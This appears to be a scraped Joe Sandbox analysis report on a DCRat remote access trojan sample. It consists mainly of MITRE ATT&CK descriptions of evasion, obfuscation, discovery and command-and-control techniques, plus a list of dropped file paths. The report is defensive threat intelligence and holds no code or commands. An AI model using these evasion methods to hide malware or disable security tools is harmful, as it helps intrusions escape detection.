Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kQyd2z80gD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\24dbde2999530e

C:\Recovery\38384e6a620884

C:\Recovery\5140eeb670c7f4

C:\Recovery\SearchApp.exe

C:\Recovery\SearchApp.exe:Zone.Identifier

C:\Recovery\WmiPrvSE.exe

C:\Recovery\WmiPrvSE.exe:Zone.Identifier

C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier

C:\Users\Default\5140eeb670c7f4

C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe

C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SearchApp.exe.log

Windows Analysis Report
kQyd2z80gD.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre